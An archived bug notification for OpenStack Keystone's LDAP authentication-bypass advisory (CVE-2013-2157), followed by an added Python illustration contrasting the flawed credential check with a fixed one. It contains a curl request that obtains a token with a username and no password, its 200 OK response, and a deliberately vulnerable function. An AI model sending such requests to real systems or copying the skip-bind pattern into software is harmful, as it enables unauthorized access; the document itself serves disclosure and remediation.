
yahoo-eng-team team mailing list archive

[Bug 1187305] Re: [OSSA 2013-015] LDAP vulnerability when checking user credentials (CVE-2013-2157)


** Changed in: keystone/folsom
       Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Keystone.
https://bugs.launchpad.net/bugs/1187305

Title:
  [OSSA 2013-015] LDAP vulnerability when checking user credentials
  (CVE-2013-2157)

Status in OpenStack Identity (Keystone):
  Fix Released
Status in Keystone folsom series:
  Fix Released
Status in Keystone grizzly series:
  Fix Released
Status in OpenStack Security Advisories:
  Fix Released

Bug description:
  There is a security vulnerability in the LDAP module when retrieving a
  token while checking the credentials of a user.

  If the password field is not specified, the ldap module does not do
  the simple_bind and it always returns a valid connection.

  curl -i https://lxbrf17b01.cern.ch:5000/v2.0/tokens -X POST \
    -H "Content-Type: application/json" \
    -d '{"auth": {"passwordCredentials":{"username":"jcastro"}}}' --insecure

  HTTP/1.1 200 OK
  Vary: X-Auth-Token
  Content-Type: application/json
  Content-Length: 223
  Date: Tue, 04 Jun 2013 08:30:31 GMT

  {"access": {"token": {"expires": "2013-06-05T08:30:31Z",
                        "id": "cec066b8d1df485a9d90e25b555ac0ff"},
              "serviceCatalog": [],
              "user": {"username": "jcastro", "roles_links": [], "id": "jcastro",
                       "roles": [], "name": "jcastro"}}}

To manage notifications about this bug go to:
https://bugs.launchpad.net/keystone/+bug/1187305/+subscriptions
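The defect described in the bug report, modelled as an added example that is not Keystone's own code: a credential check that only binds when a password is present is shown next to a hardened form that rejects an empty or missing password and always requires a successful bind. The LDAP connection, the DN layout and the directory contents are constructed stand-ins.

```python
# Added illustration of the CVE-2013-2157 pattern; not Keystone's code.


class FakeLdapConnection:
    """Constructed stand-in for an LDAP server holding one known account."""

    def __init__(self, directory):
        self._directory = directory  # {user_dn: password}, constructed data
        self.bound_as = None

    def simple_bind_s(self, user_dn, password):
        # Models the two outcomes that matter here: the supplied
        # credentials match the directory entry, or the bind fails.
        if self._directory.get(user_dn) != password:
            raise PermissionError("invalid credentials")
        self.bound_as = user_dn


def user_dn_for(username):
    # Assumed DN layout for the constructed directory.
    return "uid=%s,ou=users,dc=example,dc=org" % username


def check_credentials_vulnerable(conn, username, password):
    """Mirrors the reported defect: the bind only happens when a password
    was supplied, so a request with no password field is treated as
    authenticated without the directory ever being consulted."""
    if password:
        conn.simple_bind_s(user_dn_for(username), password)
    return True


def check_credentials_fixed(conn, username, password):
    """Hardened form: an empty or missing secret is refused up front, and
    success is reported only after the bind itself succeeds."""
    if not password:
        return False
    try:
        conn.simple_bind_s(user_dn_for(username), password)
    except PermissionError:
        return False
    return conn.bound_as == user_dn_for(username)


# Constructed directory with a single account for demonstration.
DIRECTORY = {user_dn_for("jcastro"): "correct-horse-battery"}
```

Running the two checks against the same request with the password field absent (`password=None`) reproduces the 200 OK behaviour in the vulnerable variant and a refusal in the fixed one.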